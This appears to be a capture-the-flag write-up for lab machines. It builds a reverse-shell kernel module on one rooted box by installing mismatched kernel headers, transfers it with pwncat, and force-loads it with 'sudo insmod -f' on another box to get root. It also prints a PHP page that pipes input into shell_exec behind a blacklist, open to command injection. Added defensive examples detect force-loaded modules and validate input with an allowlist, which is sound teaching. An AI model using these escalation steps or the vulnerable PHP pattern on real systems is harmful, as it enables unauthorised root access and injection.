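# Usage on the build host, second argument copied from `uname -r` on the target:
#   sh check_ko.sh reverse-shell.ko 4.19.0-12-amd64
if [ $# -eq 2 ]; then
    check_ko "$1" "$2"
fi
```

Headers for 4.19.0-20-amd64 produce a module stamped 4.19.0-20-amd64, which this check flags against a 4.19.0-12-amd64 target. Debian's kernels are built with CONFIG_MODVERSIONS (the modversions flag in the vermagic shows it), so symbol CRCs are compared as well and a module from a different ABI revision can be refused even when the release string has been patched; when the target refuses a module, dmesg there prints the exact reason.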
google hacking
SML, why didn't you install make! Answer me!!!! Look in my eyes, tell me, why? Why?
Perseverance pays off:
todd turns out to run the same kernel version: https://www.cnblogs.com/smoggy1/p/18814849
Let's go look at those two boxes! Wait for my news, brothers!
root@helium:~# find / -name '*make*' 2>/dev/null
/usr/lib/python3/dist-packages/urllib3/packages/backports/makefile.py
/usr/lib/python3/dist-packages/urllib3/packages/backports/__pycache__/makefile.cpython-37.pyc
/usr/lib/systemd/systemd-makefs
/usr/share/cmake
/usr/share/cmake/bash-completion/bash-completion-config.cmake
/usr/share/cmake/bash-completion/bash-completion-config-version.cmake
/usr/share/bash-completion/completions/gnatmake
/usr/share/bash-completion/completions/pmake
/usr/share/bash-completion/completions/automake-1.12
/usr/share/bash-completion/completions/automake-1.14
/usr/share/bash-completion/completions/gmake
/usr/share/bash-completion/completions/colormake
/usr/share/bash-completion/completions/automake-1.13
/usr/share/bash-completion/completions/automake-1.11
/usr/share/bash-completion/completions/makepkg
/usr/share/bash-completion/completions/automake
/usr/share/bash-completion/completions/automake-1.15
/usr/share/bash-completion/completions/gnumake
/usr/share/bash-completion/completions/make
/usr/share/bash-completion/completions/automake-1.10
/usr/share/console-setup/kbdnames-maker
/usr/share/man/man8/systemd-makefs.8.gz
/usr/share/man/man8/systemd-makeswap@.service.8.gz
/usr/share/man/man8/systemd-makefs@.service.8.gz
/usr/share/nano/makefile.nanorc
/usr/share/nano/cmake.nanorc
As expected of boxes from the same author, sml.
root@todd:~# find / -name "*make*" 2>/dev/null
/usr/sbin/make-ssl-cert
/usr/lib/systemd/systemd-makefs
/usr/lib/python3/dist-packages/urllib3/packages/backports/makefile.py
/usr/lib/python3/dist-packages/urllib3/packages/backports/__pycache__/makefile.cpython-37.pyc
/usr/share/cmake
/usr/share/cmake/bash-completion/bash-completion-config.cmake
/usr/share/cmake/bash-completion/bash-completion-config-version.cmake
/usr/share/vim/vim81/ftplugin/cmake.vim
/usr/share/vim/vim81/ftplugin/make.vim
/usr/share/vim/vim81/ftplugin/automake.vim
/usr/share/vim/vim81/syntax/cmake.vim
/usr/share/vim/vim81/syntax/make.vim
/usr/share/vim/vim81/syntax/automake.vim
/usr/share/vim/vim81/indent/cmake.vim
/usr/share/vim/vim81/indent/make.vim
/usr/share/vim/vim81/indent/automake.vim
/usr/share/man/man3/makecontext.3.gz
/usr/share/man/man3/gnu_dev_makedev.3.gz
/usr/share/man/man3/cfmakeraw.3.gz
/usr/share/man/man3/inet_makeaddr.3.gz
/usr/share/man/man3/makedev.3.gz
/usr/share/man/man8/systemd-makefs.8.gz
/usr/share/man/man8/systemd-makeswap@.service.8.gz
/usr/share/man/man8/systemd-makefs@.service.8.gz
/usr/share/man/man8/make-ssl-cert.8.gz
/usr/share/bash-completion/completions/automake-1.14
/usr/share/bash-completion/completions/colormake
/usr/share/bash-completion/completions/automake-1.12
/usr/share/bash-completion/completions/makepkg
/usr/share/bash-completion/completions/pmake
/usr/share/bash-completion/completions/gnatmake
/usr/share/bash-completion/completions/automake-1.10
/usr/share/bash-completion/completions/automake-1.11
/usr/share/bash-completion/completions/automake-1.13
/usr/share/bash-completion/completions/make
/usr/share/bash-completion/completions/gnumake
/usr/share/bash-completion/completions/gmake
/usr/share/bash-completion/completions/automake-1.15
/usr/share/bash-completion/completions/automake
/usr/share/nano/cmake.nanorc
/usr/share/nano/makefile.nanorc
/usr/share/console-setup/kbdnames-maker
No make there either, but with root we can simply install it over the network!
# sudo apt install make
(remote) root@todd:/tmp# uname -a
Linux todd 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64 GNU/Linux
(remote) root@todd:/tmp# vim reverse-shell.c
(remote) root@todd:/tmp# vim Makefile
(remote) root@todd:/tmp# cat -A Makefile
obj-m +=reverse-shell.o$
$
all:$
^Imake -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules$
$
clean:$
^Imake -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean$
(remote) root@todd:/tmp# make
make -C /lib/modules/4.19.0-12-amd64/build M=/tmp modules
make[1]: *** /lib/modules/4.19.0-12-amd64/build: No such file or directory. Stop.
make: *** [Makefile:4: all] Error 2
Same error: the running kernel's build directory does not exist:
(remote) root@todd:/tmp# ls /lib/modules/$(uname -r)/build
ls: cannot access '/lib/modules/4.19.0-12-amd64/build': No such file or directory
Try downloading https://github.com/stratum/sonic-base-image/releases/download/2022-08-12/linux-headers-4.19.0-12-2-amd64_4.19.152-1_amd64.deb
(remote) root@todd:/tmp# sudo dpkg -i linux-headers-4.19.0-12-2-amd64_4.19.152-1_amd64.deb
Selecting previously unselected package linux-headers-4.19.0-12-2-amd64.
(Reading database ... 40390 files and directories currently installed.)
Preparing to unpack linux-headers-4.19.0-12-2-amd64_4.19.152-1_amd64.deb ...
Unpacking linux-headers-4.19.0-12-2-amd64 (4.19.152-1) ...
dpkg: dependency problems prevent configuration of linux-headers-4.19.0-12-2-amd64:
linux-headers-4.19.0-12-2-amd64 depends on linux-headers-4.19.0-12-2-common (= 4.19.152-1); however:
Package linux-headers-4.19.0-12-2-common is not installed.
linux-headers-4.19.0-12-2-amd64 depends on linux-kbuild-4.19 (>= 4.19.152-1); however:
Package linux-kbuild-4.19 is not installed.
linux-headers-4.19.0-12-2-amd64 depends on linux-compiler-gcc-8-x86; however:
Package linux-compiler-gcc-8-x86 is not installed.
dpkg: error processing package linux-headers-4.19.0-12-2-amd64 (--install):
dependency problems - leaving unconfigured
Errors were encountered while processing:
linux-headers-4.19.0-12-2-amd64
Force-install it:
(remote) root@todd:/tmp# sudo dpkg -i --force-all linux-headers-4.19.0-12-2-amd64_4.19.152-1_amd64.deb
(Reading database ... 48543 files and directories currently installed.)
Preparing to unpack linux-headers-4.19.0-12-2-amd64_4.19.152-1_amd64.deb ...
Unpacking linux-headers-4.19.0-12-2-amd64 (4.19.152-1) over (4.19.152-1) ...
dpkg: linux-headers-4.19.0-12-2-amd64: dependency problems, but configuring anyway as you requested:
linux-headers-4.19.0-12-2-amd64 depends on linux-headers-4.19.0-12-2-common (= 4.19.152-1); however:
Package linux-headers-4.19.0-12-2-common is not installed.
linux-headers-4.19.0-12-2-amd64 depends on linux-kbuild-4.19 (>= 4.19.152-1); however:
Package linux-kbuild-4.19 is not installed.
linux-headers-4.19.0-12-2-amd64 depends on linux-compiler-gcc-8-x86; however:
Package linux-compiler-gcc-8-x86 is not installed.
Setting up linux-headers-4.19.0-12-2-amd64 (4.19.152-1) ...
Then carry on! The result of force-installing is that nothing is solved: the package is for the ABI 4.19.0-12-2-amd64, a different name from the running 4.19.0-12-amd64, so it creates its own /lib/modules/4.19.0-12-2-amd64 directory and still provides no build link for the running kernel (and without linux-kbuild-4.19 there is nothing to build with anyway):
(remote) root@todd:/tmp# ls -la /lib/modules/
total 20
drwxr-xr-x 5 root root 4096 Jun 27 13:42 .
drwxr-xr-x 55 root root 4096 Feb 19 11:04 ..
drwxr-xr-x 2 root root 4096 Jun 27 13:44 4.19.0-12-2-amd64
drwxr-xr-x 3 root root 4096 Nov 13 2020 4.19.0-12-amd64
drwxr-xr-x 3 root root 4096 Nov 13 2020 4.19.0-9-amd64
(remote) root@todd:/tmp# ls -la /lib/modules/4.19.0-12-amd64/build
ls: cannot access '/lib/modules/4.19.0-12-amd64/build': No such file or directory
(remote) root@todd:/tmp# ls -la /lib/modules/4.19.0-12-amd64/
total 4456
drwxr-xr-x 3 root root 4096 Nov 13 2020 .
drwxr-xr-x 5 root root 4096 Jun 27 13:42 ..
drwxr-xr-x 12 root root 4096 Nov 13 2020 kernel
-rw-r--r-- 1 root root 1130658 Nov 13 2020 modules.alias
-rw-r--r-- 1 root root 1077543 Nov 13 2020 modules.alias.bin
-rw-r--r-- 1 root root 4683 Oct 18 2020 modules.builtin
-rw-r--r-- 1 root root 5999 Nov 13 2020 modules.builtin.bin
-rw-r--r-- 1 root root 434780 Nov 13 2020 modules.dep
-rw-r--r-- 1 root root 592745 Nov 13 2020 modules.dep.bin
-rw-r--r-- 1 root root 456 Nov 13 2020 modules.devname
-rw-r--r-- 1 root root 140056 Oct 18 2020 modules.order
-rw-r--r-- 1 root root 800 Nov 13 2020 modules.softdep
-rw-r--r-- 1 root root 506751 Nov 13 2020 modules.symbols
-rw-r--r-- 1 root root 625597 Nov 13 2020 modules.symbols.bin
Trying a nearby kernel version
Still no build directory. Instead of this exact version, try the nearby ones:
apt install linux-headers-4.19.0-12-amd64
apt install linux-headers-4.19.0-13-amd64
apt install linux-headers-4.19.0-14-amd64
apt install linux-headers-4.19.0-15-amd64
apt install linux-headers-4.19.0-16-amd64
apt install linux-headers-4.19.0-17-amd64
apt install linux-headers-4.19.0-18-amd64
apt install linux-headers-4.19.0-19-amd64
apt install linux-headers-4.19.0-20-amd64
Only the last one is still in the repository; if that had failed too I would have written a script to brute-force the list.
The complete steps are then as follows:
(remote) root@todd:/tmp# apt install linux-headers-4.19.0-20-amd64
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
linux-compiler-gcc-8-x86 linux-headers-4.19.0-20-common linux-kbuild-4.19
The following NEW packages will be installed:
linux-compiler-gcc-8-x86 linux-headers-4.19.0-20-amd64 linux-headers-4.19.0-20-common linux-kbuild-4.19
0 upgraded, 4 newly installed, 0 to remove and 135 not upgraded.
Need to get 11.3 MB of archives.
After this operation, 58.9 MB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 https://mirrors.tuna.tsinghua.edu.cn/debian-security buster/updates/main amd64 linux-compiler-gcc-8-x86 amd64 4.19.316-1 [707 kB]
Get:2 https://mirrors.tuna.tsinghua.edu.cn/debian buster/main amd64 linux-headers-4.19.0-20-common all 4.19.235-1 [8,545 kB]
Get:3 https://mirrors.tuna.tsinghua.edu.cn/debian-security buster/updates/main amd64 linux-kbuild-4.19 amd64 4.19.316-1 [941 kB]
Get:4 https://mirrors.tuna.tsinghua.edu.cn/debian buster/main amd64 linux-headers-4.19.0-20-amd64 amd64 4.19.235-1 [1,075 kB]
Fetched 11.3 MB in 1s (14.1 MB/s)
Selecting previously unselected package linux-compiler-gcc-8-x86.
(Reading database ... 40348 files and directories currently installed.)
Preparing to unpack .../linux-compiler-gcc-8-x86_4.19.316-1_amd64.deb ...
Unpacking linux-compiler-gcc-8-x86 (4.19.316-1) ...
Selecting previously unselected package linux-headers-4.19.0-20-common.
Preparing to unpack .../linux-headers-4.19.0-20-common_4.19.235-1_all.deb ...
Unpacking linux-headers-4.19.0-20-common (4.19.235-1) ...
Selecting previously unselected package linux-kbuild-4.19.
Preparing to unpack .../linux-kbuild-4.19_4.19.316-1_amd64.deb ...
Unpacking linux-kbuild-4.19 (4.19.316-1) ...
Selecting previously unselected package linux-headers-4.19.0-20-amd64.
Preparing to unpack .../linux-headers-4.19.0-20-amd64_4.19.235-1_amd64.deb ...
Unpacking linux-headers-4.19.0-20-amd64 (4.19.235-1) ...
Setting up linux-compiler-gcc-8-x86 (4.19.316-1) ...
Setting up linux-kbuild-4.19 (4.19.316-1) ...
Setting up linux-headers-4.19.0-20-common (4.19.235-1) ...
Setting up linux-headers-4.19.0-20-amd64 (4.19.235-1) ...
(remote) root@todd:/tmp# ls -la /lib/modules/4.19.0-20-amd64/build
lrwxrwxrwx 1 root root 38 Mar 17 2022 /lib/modules/4.19.0-20-amd64/build -> /usr/src/linux-headers-4.19.0-20-amd64
(remote) root@todd:/tmp# vim reverse-shell.c
(remote) root@todd:/tmp# chmod +x *
(remote) root@todd:/tmp# vim Makefile
(remote) root@todd:/tmp# cat -A Makefile
obj-m +=reverse-shell.o$
$
all:$
^Imake -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules$
$
clean:$
^Imake -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean$
(remote) root@todd:/tmp# sudo apt install make
Reading package lists... Done
Building dependency tree
Reading state information... Done
Suggested packages:
make-doc
The following NEW packages will be installed:
make
0 upgraded, 1 newly installed, 0 to remove and 135 not upgraded.
Need to get 341 kB of archives.
After this operation, 1,327 kB of additional disk space will be used.
Get:1 https://mirrors.tuna.tsinghua.edu.cn/debian buster/main amd64 make amd64 4.2.1-1.2 [341 kB]
Fetched 341 kB in 0s (1,017 kB/s)
Selecting previously unselected package make.
(Reading database ... 57718 files and directories currently installed.)
Preparing to unpack .../make_4.2.1-1.2_amd64.deb ...
Unpacking make (4.2.1-1.2) ...
Setting up make (4.2.1-1.2) ...
Processing triggers for man-db (2.8.5-2) ...
(remote) root@todd:/tmp# make
make -C /lib/modules/4.19.0-12-amd64/build M=/tmp modules
make[1]: *** /lib/modules/4.19.0-12-amd64/build: No such file or directory. Stop.
make: *** [Makefile:4: all] Error 2
(remote) root@todd:/tmp# vim Makefile
(remote) root@todd:/tmp# cat -A Makefile
obj-m +=reverse-shell.o$
$
all:$
^Imake -C /lib/modules/4.19.0-20-amd64/build M=$(PWD) modules$
clean:$
^Imake -C /lib/modules/4.19.0-20-amd64/build M=$(PWD) clean$
(remote) root@todd:/tmp# make
make -C /lib/modules/4.19.0-20-amd64/build M=/tmp modules
make[1]: Entering directory '/usr/src/linux-headers-4.19.0-20-amd64'
CC [M] /tmp/reverse-shell.o
Building modules, stage 2.
MODPOST 1 modules
CC /tmp/reverse-shell.mod.o
LD [M] /tmp/reverse-shell.ko
make[1]: Leaving directory '/usr/src/linux-headers-4.19.0-20-amd64'
It worked!!!! Master, I did it!!!! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAH, pull it down to my machine and go all in!!!!!!
(remote) root@todd:/tmp# ls -la
total 716
drwxrwxrwt 10 root root 4096 Jun 27 14:22 .
drwxr-xr-x 18 root root 4096 Nov 13 2020 ..
drwxrwxrwt 2 root root 4096 Jun 27 14:15 .font-unix
drwxrwxrwt 2 root root 4096 Jun 27 14:15 .ICE-unix
-rw-r--r-- 1 root root 157 Jun 27 14:22 Makefile
-rw-r--r-- 1 root root 29 Jun 27 14:22 modules.order
-rw-r--r-- 1 root root 0 Jun 27 14:22 Module.symvers
-rwxr-xr-x 1 root root 712 Jun 27 14:20 reverse-shell.c
-rw-r--r-- 1 root root 279960 Jun 27 14:22 reverse-shell.ko
-rw-r--r-- 1 root root 237 Jun 27 14:22 .reverse-shell.ko.cmd
-rw-r--r-- 1 root root 883 Jun 27 14:22 reverse-shell.mod.c
-rw-r--r-- 1 root root 140280 Jun 27 14:22 reverse-shell.mod.o
-rw-r--r-- 1 root root 49174 Jun 27 14:22 .reverse-shell.mod.o.cmd
-rw-r--r-- 1 root root 141200 Jun 27 14:22 reverse-shell.o
-rw-r--r-- 1 root root 48846 Jun 27 14:22 .reverse-shell.o.cmd
drwx--x--x 3 root root 4096 Jun 27 14:15 systemd-private-981b29ebdea144e980609337611df08b-apache2.service-L6WvPd
drwx--x--x 3 root root 4096 Jun 27 14:15 systemd-private-981b29ebdea144e980609337611df08b-systemd-timesyncd.service-hJzwPy
drwxrwxrwt 2 root root 4096 Jun 27 14:15 .Test-unix
drwxr-xr-x 2 root root 4096 Jun 27 14:22 .tmp_versions
drwxrwxrwt 2 root root 4096 Jun 27 14:15 .X11-unix
drwxrwxrwt 2 root root 4096 Jun 27 14:15 .XIM-unix
(remote) root@todd:/tmp#
(local) pwncat$ lpwd
/home/kali/temp/Todd
(local) pwncat$ lcd ../Troya
(local) pwncat$ download reverse-shell.ko
reverse-shell.ko ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 280.0/280.0 KB • ? • 0:00:00[14:24:45] downloaded 279.96KiB in 0.41 seconds
Go all in!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
(remote) helena@troya:/tmp$
(local) pwncat$ upload reverse-shell.ko
./reverse-shell.ko ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 280.0/280.0 KB • ? • 0:00:00[14:31:37] uploaded 279.96KiB in 0.31 seconds upload.py:76
(local) pwncat$
(remote) helena@troya:/tmp$ chmod +x *
chmod: changing permissions of 'systemd-private-bcd14e7627754f2cb355070e6a82b6ea-systemd-timesyncd.service-4SITWq': Operation not permitted
(remote) helena@troya:/tmp$ sudo /usr/sbin/insmod reverse-shell.ko
insmod: ERROR: could not insert module reverse-shell.ko: Invalid module format
You tell me this now, after all that?!!! Just force the module in with the -f flag!!!!!
(remote) helena@troya:/tmp$ sudo /usr/sbin/insmod -f reverse-shell.ko
Got a root shell!!!!!
Some information
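From the defender's side, that `insmod -f` leaves a durable trace: kmod strips the module's version magic so the kernel accepts the mismatched build, and a kernel built with CONFIG_MODULE_FORCE_LOAD then sets the F taint bit and stamps the module with an F in /proc/modules. The script below is an added example (not part of this writeup or the box) that decodes both; the /proc/modules sample is constructed, and the module name reverse_shell is what kbuild derives from reverse-shell.ko.

```python
"""Spot force-loaded kernel modules from the host side (added example)."""
import re

# Subset of Documentation/admin-guide/tainted-kernels.rst: bit -> (letter, meaning).
TAINT_BITS = {
    0: ("P", "proprietary module loaded"),
    1: ("F", "module force loaded"),
    3: ("R", "module force unloaded"),
    6: ("U", "taint requested by userspace"),
    12: ("O", "out-of-tree module loaded"),
    13: ("E", "unsigned module loaded"),
}

# Constructed /proc/modules excerpt: name size refcnt deps state addr [taint letters].
SAMPLE_PROC_MODULES = """\
reverse_shell 16384 0 - Live 0xffffffffc0a00000 (FOE)
nf_tables 143360 0 - Live 0xffffffffc08c0000
xt_conntrack 16384 1 - Live 0xffffffffc0770000
"""


def decode_taint(mask: int) -> list[str]:
    """Return the taint letters set in a /proc/sys/kernel/tainted value."""
    return [letter for bit, (letter, _) in sorted(TAINT_BITS.items()) if mask >> bit & 1]


def tainted_modules(proc_modules: str) -> dict[str, str]:
    """Map module name -> taint letters for every tainted entry in /proc/modules."""
    found = {}
    for line in proc_modules.splitlines():
        m = re.match(r"(\S+)\s.*\(([A-Z+-]+)\)\s*$", line)
        if m:
            found[m.group(1)] = m.group(2)
    return found


def forced_modules(proc_modules: str) -> list[str]:
    """Names of modules carrying the F (force-loaded) flag: a strong review signal."""
    return sorted(n for n, flags in tainted_modules(proc_modules).items() if "F" in flags)


def read_live() -> tuple[list[str], dict[str, str]]:
    """Read the real kernel state on a Linux host (raises OSError elsewhere)."""
    with open("/proc/sys/kernel/tainted") as fh:
        flags = decode_taint(int(fh.read()))
    with open("/proc/modules") as fh:
        mods = tainted_modules(fh.read())
    return flags, mods
```

A taint mask of 4098 (2 + 4096) means a force-loaded out-of-tree module; pair the F letter in /proc/modules with the kernel log line `<name>: bad vermagic: kernel tainted.` to attribute it.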
(remote) www-data@troya:/var/www/html$ cat index.php
<html>
<body>
<form method="post" action="<?php echo $_SERVER['PHP_SELF'];?>">
Enter ip: <input type="text" name="command">
<input type="submit">
</form>
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
$command = $_POST['command'];
$blacklistchars = '"%\'*iash;<>^`{}~\\#=&';
if (preg_match('/[' . $blacklistchars . ']/', $command)) {
echo ("No valid character detected");
} else {
$cmd = 'host '.$command;
$output = shell_exec($cmd);
echo "<pre>$output</pre>";
}
}
?>
</body>
</html>
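The check in index.php is a blacklist: it strips a list of characters from `$command` and concatenates whatever survives into `shell_exec('host ' . $command)`. The inverse shape, written here in Python as an added example (not the box's PHP), accepts only a syntactically valid IP literal or DNS name and hands it to `host` as a single argv element, so no shell ever parses it.

```python
"""Allowlist validation for a `host <target>` lookup (added example)."""
import ipaddress
import re
import subprocess

# RFC 1123 label: 1-63 alphanumerics or hyphens, no leading or trailing hyphen.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}\.?$")


def is_valid_target(value: str) -> bool:
    """True only for an IPv4/IPv6 literal or a well-formed DNS name."""
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    return _HOSTNAME_RE.fullmatch(value) is not None


def build_host_argv(value: str) -> list[str]:
    """argv for the lookup, or ValueError; the list form means no shell parsing.

    Hostnames cannot start with '-' and IP literals never do, so the
    validated target can never be mistaken for a `host` option.
    """
    if not is_valid_target(value):
        raise ValueError("target is not an IP address or hostname")
    return ["host", value]


def lookup(value: str, timeout: float = 5.0) -> str:
    """Run the resolver with no shell involved; validation happens first."""
    argv = build_host_argv(value)  # raises before anything executes
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    return proc.stdout
```

The PHP equivalent of the same design is `filter_var($command, FILTER_VALIDATE_IP)` or a hostname regex as the gate, then `proc_open()` with an argv array (or at minimum `escapeshellarg()`) instead of string concatenation into `shell_exec()`.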